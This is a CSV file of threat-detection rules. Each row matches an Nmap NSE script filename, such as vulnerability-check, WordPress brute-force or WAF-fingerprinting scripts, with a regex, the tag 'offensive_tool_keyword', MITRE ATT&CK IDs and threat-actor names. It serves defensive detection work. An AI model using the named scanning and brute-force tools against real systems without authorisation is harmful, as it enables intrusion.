"* http-svn-enum.nse*",".{0,1000}\shttp\-svn\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1546"
"* http-svn-info.nse*",".{0,1000}\shttp\-svn\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1547"
"* http-tenda-enum.nse*",".{0,1000}\shttp\-tenda\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","0","N/A","N/A","N/A","10","968","369","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z","1548"
"* http-title.nse*",".{0,1000}\shttp\-title\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1549"
"* http-tplink-dir-traversal.nse*",".{0,1000}\shttp\-tplink\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1550"
"* http-trace.nse*",".{0,1000}\shttp\-trace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1551"
"* http-traceroute.nse*",".{0,1000}\shttp\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1552"
"* http-trane-info.nse*",".{0,1000}\shttp\-trane\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1553"
"* http-unsafe-output-escaping.nse*",".{0,1000}\shttp\-unsafe\-output\-escaping\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1554"
"* http-useragent-tester.nse*",".{0,1000}\shttp\-useragent\-tester\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1555"
"* http-userdir-enum.nse*",".{0,1000}\shttp\-userdir\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1556"
"* http-vhosts.nse*",".{0,1000}\shttp\-vhosts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1557"
"* http-virustotal.nse*",".{0,1000}\shttp\-virustotal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1558"
"* http-vlcstreamer-ls.nse*",".{0,1000}\shttp\-vlcstreamer\-ls\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1559"
"* http-vmware-path-vuln.nse*",".{0,1000}\shttp\-vmware\-path\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1560"
"* http-vuln-cve2006-3392.nse*",".{0,1000}\shttp\-vuln\-cve2006\-3392\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1561"
"* http-vuln-cve2009-3960.nse*",".{0,1000}\shttp\-vuln\-cve2009\-3960\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1562"
"* http-vuln-cve2010-0738.nse*",".{0,1000}\shttp\-vuln\-cve2010\-0738\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1563"
"* http-vuln-cve2010-2861.nse*",".{0,1000}\shttp\-vuln\-cve2010\-2861\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1564"
"* http-vuln-cve2011-3192.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3192\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1565"
"* http-vuln-cve2011-3368.nse*",".{0,1000}\shttp\-vuln\-cve2011\-3368\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1566"
"* http-vuln-cve2012-1823.nse*",".{0,1000}\shttp\-vuln\-cve2012\-1823\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1567"
"* http-vuln-cve2013-0156.nse*",".{0,1000}\shttp\-vuln\-cve2013\-0156\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1568"
"* http-vuln-cve2013-6786.nse*",".{0,1000}\shttp\-vuln\-cve2013\-6786\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1569"
"* http-vuln-cve2013-7091.nse*",".{0,1000}\shttp\-vuln\-cve2013\-7091\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1570"
"* http-vuln-cve2014-2126.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2126\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1571"
"* http-vuln-cve2014-2127.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2127\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1572"
"* http-vuln-cve2014-2128.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2128\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1573"
"* http-vuln-cve2014-2129.nse*",".{0,1000}\shttp\-vuln\-cve2014\-2129\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1574"
"* http-vuln-cve2014-3704.nse*",".{0,1000}\shttp\-vuln\-cve2014\-3704\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1575"
"* http-vuln-cve2014-8877.nse*",".{0,1000}\shttp\-vuln\-cve2014\-8877\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1576"
"* http-vuln-cve2015-1427.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1427\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1577"
"* http-vuln-cve2015-1635.nse*",".{0,1000}\shttp\-vuln\-cve2015\-1635\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1578"
"* http-vuln-cve2017-1001000.nse*",".{0,1000}\shttp\-vuln\-cve2017\-1001000\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1579"
"* http-vuln-cve2017-5638.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5638\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1580"
"* http-vuln-cve2017-5689.nse*",".{0,1000}\shttp\-vuln\-cve2017\-5689\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1581"
"* http-vuln-cve2017-8917.nse*",".{0,1000}\shttp\-vuln\-cve2017\-8917\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1582"
"* http-vulners-regex.nse*",".{0,1000}\shttp\-vulners\-regex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://github.com/vulnersCom/nmap-vulners","1","0","N/A","N/A","N/A","10","3297","553","2024-04-03T11:53:29Z","2017-12-19T21:21:28Z","1583"
"* http-vuln-misfortune-cookie.nse*",".{0,1000}\shttp\-vuln\-misfortune\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1584"
"* http-vuln-wnr1000-creds.nse*",".{0,1000}\shttp\-vuln\-wnr1000\-creds\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1585"
"* http-waf-detect.nse*",".{0,1000}\shttp\-waf\-detect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1586"
"* http-waf-fingerprint.nse*",".{0,1000}\shttp\-waf\-fingerprint\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1587"
"* http-webdav-scan.nse*",".{0,1000}\shttp\-webdav\-scan\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1588"
"* http-wordpress-brute.nse*",".{0,1000}\shttp\-wordpress\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1589"
"* http-wordpress-enum.nse*",".{0,1000}\shttp\-wordpress\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1590"
"* http-wordpress-users.nse*",".{0,1000}\shttp\-wordpress\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1591"
"* http-xssed.nse*",".{0,1000}\shttp\-xssed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1592"
